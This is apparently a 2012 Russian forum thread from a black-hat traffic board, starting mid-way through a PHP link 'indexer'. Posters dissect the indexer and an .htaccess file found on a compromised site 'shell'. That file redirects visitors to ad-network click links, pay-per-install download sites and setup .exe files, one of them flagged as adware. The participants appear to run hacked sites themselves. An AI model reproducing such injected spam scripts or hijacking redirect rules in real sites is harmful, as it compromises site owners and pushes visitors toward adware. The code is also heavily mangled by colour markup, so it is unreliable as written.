R="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]]);





if([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'utf-8'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"]);

 }

 echo[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"];

 }

}

[/COLOR][COLOR="#0000BB"]get_asp[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR

DJ4J 13.09.2012 10:26
Код не полный.Это само по себе ничего не сделает.Скорее всего этот файл инклудится из другого файла, а уже тот выполняется.

Chrome~ 13.09.2012 15:21
Это код индексатора. Получает ссылки с некого http://podstava.ws/ и выводит их поисковым роботам. Но код неполный.

sova1611 13.09.2012 15:33
да подтверждаю это скрипт индексатора,даже знаю чей)но не скажу)))))

DJ4J 13.09.2012 18:45
Цитата:
Сообщение от Chrome~
Это код индексатора. Получает ссылки с некого http://podstava.ws/ и выводит их поисковым роботам. Но код неполный.
Как ты определил, откуда выводит?

//уже понял

spiderbuber 18.09.2012 13:20
Сегодня снова был немного удивлен

С индексатором определились, разобрались

Сегодня снова был немного удивлен. Уже на другом шелле нашел в htaccess такое:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]free[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]download[/COLOR][COLOR="#007700"](/?)+$ /[/COLOR][COLOR="#0000BB"]ad[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]L[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#FF8000"]# RewriteRule ^trafback(/?)+$ http://network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJ5mnH2ZiZBwlmCjqZeLZnCWjZ17m4xlag [L]

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ilivid http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJ5mnH2ZiZBwlmCjqZeLZnCWjZ17m4xlag

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mp3wmaconverter http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbpxnm36biZBwlmCjqZiNZWqWjZ56l4xoag

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gimp http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQb51inX6YiZBum2Kcg8OManCZX8p9mI9maZY

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]emule http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJdem4KViZBum2Kcg8OLYW-XX8p7nIhjbZY

[/COLOR][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]matlnk[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"](.*)+$[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbZtnoHyZiZBum2Kcg8OLaG-bX8p8mIxqcpY [L]

# RewriteRule ^hotnews(/?)+$ /ad/directadvert.html [L]

# Redirect /gaco/ http://gameconvert.net/install.php?rid=111&name=

# RewriteRule ^dlfile/(.*)+$ /ad/setup_download.exe [L]

# Редирект с подменой/files

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lomo[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//loadmoney.ru/get_file?sid=2058&url=

[/COLOR][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]m_lomo[/COLOR][COLOR="#007700"]/(.*)+$ /[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]download_setup[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]L[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#FF8000"]# Redirect /download/ /esc.php?name=

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]/ /[/COLOR][COLOR="#0000BB"]load[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]=

[/COLOR][COLOR="#FF8000"]# Redirect /goto/ /load.php?q=

# RewriteRule ^dldla/(.*)+$ /go/esc_downloader.exe [L][/COLOR][/COLOR] 
Про ПП gameconvert.net и loadmoney.ru слышал, но вот что за network.adsmarket.com ?

Стало любопытно, пошел по папкам.. Слил весь левак .

Что вообще делают эти коды?

Также что интерессно, на сайте висят несколько картинок-плееров с ссылками на визитвеб.

http://rghost.ru/40434106/image.png

Неужели визитвеб принимает траф по прямой ссылке, а не по тизерам?

Также под файлообменниками добавляется ссылка на скачку (я обычно ставлю туда слив на платник), но тут после нескольких редиректов нам предлагается скачать некое ПО:

http://a.ficklebox.com/IC/GPLAppBundler82/40210/1/b79a1917-e5a7-46e1-b7bc-751af3ae1cac/eMuleSetup.exe

Которое каспер определяет как:

Цитата:
Сообщение от None
содержит легальное ПО, которое может быть использовано злоумышленником для нанесения вреда компьютеру или данным пользователя not-a-virus:AdWare.Win32.ScreenSaver.e
Что это ЗА?

ЗЫ: Может кто признается, чьё творение (чирканите в аську)?


Время: 18:54